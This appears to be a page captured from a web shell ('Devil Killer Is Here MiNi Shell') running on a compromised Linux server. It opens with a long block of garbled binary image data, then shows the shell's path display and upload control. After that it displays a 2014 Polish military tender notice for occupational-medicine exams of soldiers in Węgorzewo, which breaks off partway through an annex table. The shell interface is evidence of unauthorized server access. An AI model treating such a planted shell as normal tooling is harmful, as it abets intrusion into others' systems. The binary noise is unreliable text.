JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/6259-N-2014.html

<p class="kh_header"><b>Giżycko: BADANIA LEKARSKIE Z ZAKRESU MEDYCYNY PRACY ŻOŁNIERZY I PRACOWNIKÓW JEDNOSTEK WOJSKOWYCH W WĘGORZEWIE</b><br>
<b>Numer ogłoszenia: 6259 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.24wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BADANIA LEKARSKIE Z ZAKRESU MEDYCYNY PRACY ŻOŁNIERZY I PRACOWNIKÓW JEDNOSTEK WOJSKOWYCH W WĘGORZEWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	KOD CPV:
85121000 - 3 - usługi medyczne
85120000 - 6 - różne usługi medyczne
85121200 - 5 - specjalistyczne usługi medyczne
2.	ZAMAWIAJĄCY PODZIELIŁ ZAMÓWIENIE NA 7 CZĘŚCI WYSZCZEGÓLNIONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.
3.	Przedmiotem zamówienia są:
usługi medyczne obejmujące profilaktyczne badania lekarskie (wstępne, okresowe, kontrolne, dodatkowe, badania diagnostyczne, konsultacje specjalistyczne), żołnierzy zawodowych i pracowników wojska JW.4352 oraz żołnierzy zawodowych 
i pracowników wojska jednostek i instytucji będących na zaopatrzeniu JW. 4352 (Rodzaj usług i ilości wyszczególnione w załączniku Nr 2 do SIWZ).
4.	Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim  oraz bazą do wykonywania badań laboratoryjnych i innych określonych w załączniku Nr 2 do SIWZ w miejscowości Węgorzewo dla żołnierzy i pracowników garnizonu Węgorzewo (JW. 2568 Węgorzewo, JW. 4311 Grójec/Węgorzewo, Grupa Zabezpieczenia Węgorzewo, Węzeł Łączności Węgorzewo).
5.	Wykonawca zobowiązuje się do wykonywania badań przez wykwalifikowany personel posiadający wszelkie niezbędne uprawnienia i dysponujący wysokiej, jakości sprzętem medycznym. 
6.	Realizacja usługi odbywać się będzie na podstawie imiennych skierowań, wystawionych i podpisanych przez organ kadrowy sekcji personalnej lub uprawnionych lekarzy działających w imieniu Zamawiającego oraz lekarza medycyny pracy wskazanego przez Wykonawcę.
a)	JW. 2568 Organ kadrowy (personalny) 
b)	JW. 3411 Organ kadrowy (personalny) 
c)	WŁ Organ kadrowy (personalny)
d)	Grupa Zabezpieczenia Organ kadrowy (personalny JW. 4352)
7.	Skierowanie zawierać będzie w szczególności: określenie rodzaju badania profilaktycznego, jakie ma być wykonane, określenie stanowiska pracy, na którym pracownik jest zatrudniony, informacje o występowaniu na stanowisku pracy czynników szkodliwych dla zdrowia lub warunków uciążliwych.
8.	Do podstawowych obowiązków Wykonawcy należeć będzie świadczenie usług z najwyższą starannością, aktualną wiedzą medyczną, dostępnymi metodami i środkami zapobiegania, rozpoznawania i leczenia chorób oraz zasadami etyki zawodowej, respektując prawa pacjenta w szczególności zgodnie z przepisami ustawy z dnia 15.04.2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654), przepisami Ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty (Dz. U. z 2008 r. Nr 136 poz. 857 z późn. zm.), przepisami Ustawy z dnia 05.07.1996 r. o zawodach pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 z późn. zm.). 
9.	Świadczenia zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarki i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem ministra Zdrowia i Opieki społecznej z dnia 30 maja 1996 r. w sprawie prowadzenia badan lekarskich pracowników zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 r. Nr 69, poz. 332 z późn. zm.).
10.	Wykonawca winien spełniać wymogi zawarte w: ustawie z dnia 27.06.1997 r. o służbie medycyny pracy (Dz. U. z 2004 r., Nr 125, poz. 1317), rozporządzeniu Ministra Zdrowia i Opieki społecznej z dnia 30.05.1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn. zm.), rozporządzeniu Ministra Zdrowia z dnia 07.01.2004 r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia kierowania pojazdami (Dz. U. Nr 2, poz. 15), rozporządzeniu Ministra Obrony Narodowej z dnia 09.08.2010r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. z 2010 r. Nr 187, poz. 1257), rozporządzeniu Ministra Obrony Narodowej z dnia 23.12.2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz.U.2011r, Nr 8, poz. 36). 
11.	Prowadzenie nadzoru dyspanseryzacyjnego oraz niezbędnej dokumentacji zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 23 grudnia 2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz. U. z 2011 r., Nr 8, poz. 36) ( zał. 15,16,17). 
12.	Gabinety, gdzie będą przeprowadzane badania muszą spełniać standardowe wymagania określone w rozporządzeniu Ministra Zdrowia z 26 czerwca  2012r w sprawie szczególnych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą ( Dz. U. z 2012 r, Nr 739.), a sprzęt medyczny posiadać atesty i dopuszczenia określone przez Ministra Zdrowia.
13.	Wykonawca będzie prowadził rejestr przyjmowanych pacjentów zawierający:
a)	Imię i nazwisko pacjenta,
b)	Nazwisko lekarza przyjmującego,
c)	Datę zgłoszenia się pacjenta i rodzaje udzielonej porady, 
d)	Wyznaczony termin przyjęcia do konsultacji i datę przyjęcia, 
e)	Datę wpisania i inne dane niezbędne dla identyfikacji świadczonych usług wg wymogów przedmiotowej umowy.
14.	Realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz.700 do godz. 1500.
15.	Termin rozpoczęcia i zakończenia badań zaproponowany przez Wykonawcę nie może przekraczać okresu 2 dni roboczych od dnia zgłoszenia się skierowanej osoby.
16.	Badania wstępne i okresowe wykonywane będą w dniu zgłoszenia się skierowanego pracownika Zamawiającego, a zakończone nie później niż następnego dnia roboczego po dniu rozpoczęciu badań.
17.	W przypadku stwierdzenia konieczności wykonania specjalistycznego badania konsultacyjnego lub badania dodatkowego, niezbędnego dla prawidłowej oceny stanu zdrowia osoby przyjmowanej do pracy lub pracownika, termin badanie nie przekroczy 7 dni roboczych.
18.	Wykonawca zapewnia bieżącą realizację usług medycznych, w szczególności dyżur od poniedziałku do piątku lekarza uprawnionego do wykonywania badań profilaktycznych, oraz zastępstwa w razie czasowej nieobecności  lekarzy specjalistów. 
19.	W razie zaistnienia przejściowych przeszkód uniemożliwiających realizację zamówienia Zamawiający wyraża zgodę na ich realizację przez podwykonawców innych placówek medycznych, o czym Wykonawca jest zobowiązany uprzedzić na piśmie Zamawiającego, wskazując okres i miejsce (adres) oraz podmiot, który będzie realizował przedmiot zamówienia.
20.	Wykonawca oświadcza, iż świadczenia zdrowotne wykonywane przez inne podmioty i osoby fizyczne, nie będą miały wpływu na ilość, jakość i terminowość oraz koszt świadczeń będących przedmiotem niniejszej umowy. 
21.	W zawodach wymagających dodatkowych specjalistycznych badań osób kierowanych Zamawiający uznaje za konieczne przeprowadzenie dodatkowych badań zgodnie z obowiązującymi przepisami.
22.	Wykonawca będzie przechowywał dokumentację z przeprowadzonych badań zgodnie z Rozporządzeniem z dnia 29 lipca 2010r w sprawie rodzaju dokumentacji służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosownych dokumentów (Dz. U. 2010r. nr 149 poz 1002)
23.	Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie
zaświadczenia stwierdzającego:
a)	Brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy;
b)	Przeciwwskazania zdrowotne do pracy na określonym stanowisku pracy.
24.	Orzeczenie lekarskie otrzymuje bezpośrednio żołnierz lub pracownik wojska, który był badany.
25.	Badanie lekarza orzecznika i wystawienie zaświadczenia do celów sanitarno-epidemiologicznych (w 2 egz. - oryginał i kopia) 
26.	Wykonawca do każdej wystawionej faktury będzie załączał zestawienie zawierające następujące dane:
a)	Nazwiska i Imiona osób przebadanych;
b)	Numery PESEL osób przebadanych;
c)	Nazwę jednostki wojskowej, bądź instytucji;
d)	Datę i rodzaj udzielonych świadczeń;
e)	Podział na pracowników wojska i żołnierzy zawodowych (PW; ŻZ).
f)	Zestawienie musi byś uprzednio potwierdzone pieczątką i podpisem jednostki wojskowej, instytucji   wystawiającej skierowanie na badanie.
27.	Wykonawca po przeprowadzeniu przez specjalistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez pracownika okularów korygujących wzrok przy obsłudze monitora ekranowego musi udokumentować konieczność korekcji wady wzroku, stosownym zaświadczeniem.
28.	Wszystkie badania objęte zakresem zamówienia muszą być wykonywane kompleksowo w tej samej miejscowości, w której stacjonują jednostki wojskowe, dopuszcza się wyjątek tj: wykonanie badania tomograficznego, konsultacji pulmunologicznej , spirometrii, konsultacji gastrologiczej, konsultacji urologicznej, badanie kału na nosicielstwo, konsultacji psychologicznej , psychiatrycznej, kardiologicznej oraz badanie lekarza uprawnionego do przeprowadzenia badań w zakresie pracy przy narażeniu na mikrofale w innej miejscowości niż znajduje się jednostka ( np. Giżycko, Ełk) jednak w odległości do 100 km od siedziby jednostki kierującej na badania.
29.	Zamawiający zastrzega sobie prawo do niewykorzystania pełnego limitu  Ilości badań lekarskich wyszczególnionych w załączniku nr 2 do SIWZ i odstąpienia od realizacji części zamówienia bez prawa roszczeń z tego tytułu przez Wykonawcę. Zamawiający zastrzega sobie prawo dokonywania korekt ilościowych jednego rodzaju badań na rzecz drugiego rodzaju badań 
(tj. zwiększenia jednych badań kosztem zmniejszenia innych badań). Przy założeniu, że niezmieniona zostanie ostateczna wartość umowy.  (ustęp  ten dotyczy zadań Nr 1, 4, 5, 6).
30.	Ilość badań lekarskich wyszczególnionych w załączniku nr 1 są ilościami szacunkowymi. Zamawiający zastrzega sobie możliwość ich zmniejszenia 
w sytuacjach uzasadnionych ważnymi powodami, a w szczególności zmniejszaniem się stanu osobowego jednostek (instytucji) wojskowych w ramach kwoty określonej w § 5 pkt. 2. ( ustęp ten dotyczy zadań Nr 2,3,7).

31.	Przedmiot zamówienia będzie realizowany zgodnie z :
Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. Nr 69, poz. 332, z późn. zm.) w szczególności:
Ustawa z dnia 11 września 2003r. o służbie wojskowej żołnierzy zawodowych (Dz. U. z 2010r nr 90, poz. 593)
Ustawa z dnia 15 kwietnia 2011r o działalności leczniczej (Dz. U. 2011r. Nr 112, poz. 654 z późn. zm.)
Ustawą z dnia 27 czerwca 1997 roku o służbie medycyny pracy (tekst jednolity Dz. U z 2004r. Nr 125 poz. 1317 z późn. zm.)
Rozporządzenie Ministra Obrony Narodowej z dnia 09 sierpnia 2010r.
w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej ( Dz. U. Nr 187 poz. 125)
Rozporządzenie Ministra Obrony Narodowej z dnia 23 grudnia 2010r.
w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz. U nr 8 z 11 stycznia 2011r, poz. 36)
Rozporządzenie Ministra Zdrowia z dnia 07 stycznia 2004r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia do kierowania pojazdami, zakończone wydaniem orzeczenia stwierdzającym istnienie lub brak przeciwwskazań zdrowotnych do kierowania pojazdami.
( DZ. U. nr 2, poz. 15 z późn. zm)
Rozporządzenie Ministra Zdrowia z dnia 23 lipca 2013r w sprawie badań lekarskich i psychologicznych osób ubiegających się o wydanie licencjioraz posiadających licencje pracownika ochrony fizycznej( Dz.U z 2013 nr 13,poz 855)
 Zarządzenie nr 12/MON z dnia 21 maja 2013r w sprawie utworzenia, przekształcenia i likwidacji podmiotów leczniczych w formie jednostki budżetowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane w danym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania  osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu znajdowania się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonywanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy 
o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego (zał.  nr 1 do SIWZ), ZESTAWIENIE CENOWE PRZEDMIOTU ZAMÓWIENIA - wypełniony  i podpisany wg wzoru Zamawiającego (Zał. nr 2 do SIWZ ), Pełnomocnictwo.
W przypadku podpisania oferty lub załączonego do niej jakiegokolwiek dokumentu i oświadczenia przez osobę nieuprawnioną  do reprezentacji wprost z postanowień KRS lub CEIDG (Centralna Ewidencja i Informacja o Działalności Gospodarczej) należy dołączyć pełnomocnictwo, sporządzone zgodnie z wymaganiami Kodeksu Cywilnego - oryginał lub notarialnie potwierdzoną kopię dokumentu. 

- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy pzp).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy.
1.Zamawiający zastrzega sobie prawo do niewykorzystania pełnego limitu  Ilości badań lekarskich wyszczególnionych w załączniku nr 2 do SIWZ i odstąpienia od realizacji części zamówienia bez prawa roszczeń z tego tytułu przez Wykonawcę. Zamawiający zastrzega sobie prawo dokonywania korekt ilościowych jednego rodzaju badań na rzecz drugiego rodzaju badań 
(tj. zwiększenia jednych badań kosztem zmniejszenia innych badań). Przy założeniu, że niezmieniona zostanie ostateczna wartość umowy.  (ustęp  ten dotyczy zadań Nr 1, 4, 5, 6).
2.	Ilość badań lekarskich wyszczególnionych w załączniku nr 1 są ilościami szacunkowymi. Zamawiający zastrzega sobie możliwość ich zmniejszenia 
w sytuacjach uzasadnionych ważnymi powodami, a w szczególności zmniejszaniem się stanu osobowego jednostek (instytucji) wojskowych w ramach kwoty określonej w § 5 pkt. 2. ( ustęp ten dotyczy zadań Nr 2,3,7).
3.3 Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w umowie w przypadku zmiany stawki podatku od towarów i usług  w 2014r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.24wog.wp.mil.pl, www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU, ul. Nowowiejska 20, 11-500 GIŻYCKO, budynek nr 5, pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2014 godzina 08:00, miejsce: JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU, ul. Nowowiejska 20, 11-500 GIŻYCKO, budynek nr 5, pok. nr 109, Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR I  BADANIA TK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Rodzaj Badania	JM	Ilość szacunkowa
